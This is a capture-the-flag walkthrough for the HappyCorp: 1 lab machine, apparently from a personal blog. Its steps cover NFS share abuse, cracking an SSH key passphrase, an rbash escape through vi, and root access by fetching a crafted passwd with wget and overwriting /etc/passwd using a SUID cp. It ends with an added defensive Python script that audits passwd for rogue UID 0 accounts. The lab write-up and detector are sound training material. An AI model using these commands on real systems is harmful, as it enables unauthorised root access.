Rajoul@home:~##

HappyCorp: 1

  • 1- Let’s start by scanning the target machine, which reveals an important open port: 2049 -> open -> NFS share.
  • 2- Enumerate the exported shares: showmount -e 10.0.4.36
  • 3- Mount the shared directory: mount -t nfs 10.0.4.36:/home/karl /tmp/share
  • 4- Go to /tmp/share and run ls -al: we can’t access the .ssh directory.
  • 5- Create a group with GID 1001: groupadd -g 1001 mygroup
  • 6- Add my user account to the created group: useradd -G mygroup root => we can now access the shared .ssh directory.
  • 7- Upload his private SSH key -> use ssh2john to retrieve the passphrase.
  • 8- Connect with the private SSH key and land in an rbash shell.
  • 9- Abuse vi to break out of the restricted bash: vi -> :!/bin/sh
  • 10- Look for SUID binaries: find / -perm -u=s -type f 2>/dev/null
  • 11- /bin/cp can be run as the root user (SUID).
  • 12- wget http://10.0.4.36:8000/passwd -> cp passwd /etc/passwd -> su tbag (root user)
  • 13- boooooooooooooooooooom
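Added defender-side check, not part of the original walkthrough: the last step works by overwriting /etc/passwd with a crafted copy that carries an extra UID 0 account whose password hash sits directly in the second field. The Python audit below parses a passwd file and flags exactly those conditions (rogue UID 0 entries, inline hashes, empty password fields). The sample file content, the tbag entry and its placeholder hash are constructed for the example.

```python
from typing import List, Tuple

# Constructed sample: a passwd file after a "cp passwd /etc/passwd" overwrite.
# The "tbag" line is an assumed example of an injected UID 0 account whose
# password hash is stored inline instead of in /etc/shadow (placeholder hash).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
karl:x:1001:1001:Karl:/home/karl:/bin/rbash
tbag:$1$EXAMPLE$PLACEHOLDERHASH000000:0:0:root:/root:/bin/bash
"""

def parse_passwd(text: str) -> List[Tuple[str, str, int, int, str]]:
    """Return (name, passwd_field, uid, gid, shell) for each well-formed line."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line; a real audit should log it
        name, pw, uid, gid, _gecos, _home, shell = fields
        if not (uid.isdigit() and gid.isdigit()):
            continue  # non-numeric ids are also worth logging
        entries.append((name, pw, int(uid), int(gid), shell))
    return entries

def audit_passwd(text: str) -> List[str]:
    """Flag rogue UID 0 accounts and credentials kept in passwd itself."""
    findings = []
    for name, pw, uid, gid, shell in parse_passwd(text):
        if uid == 0 and name != "root":
            findings.append(f"{name}: extra UID 0 account (shell {shell})")
        if pw == "":
            findings.append(f"{name}: empty password field (no password)")
        elif pw not in ("x", "*", "!", "!!"):
            # 'x' defers to /etc/shadow; '*' and '!' variants lock the account
            findings.append(f"{name}: password hash stored in /etc/passwd")
    return findings

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print("FINDING:", finding)
```

Run it against a live system with `audit_passwd(open("/etc/passwd").read())`; a clean box returns an empty list.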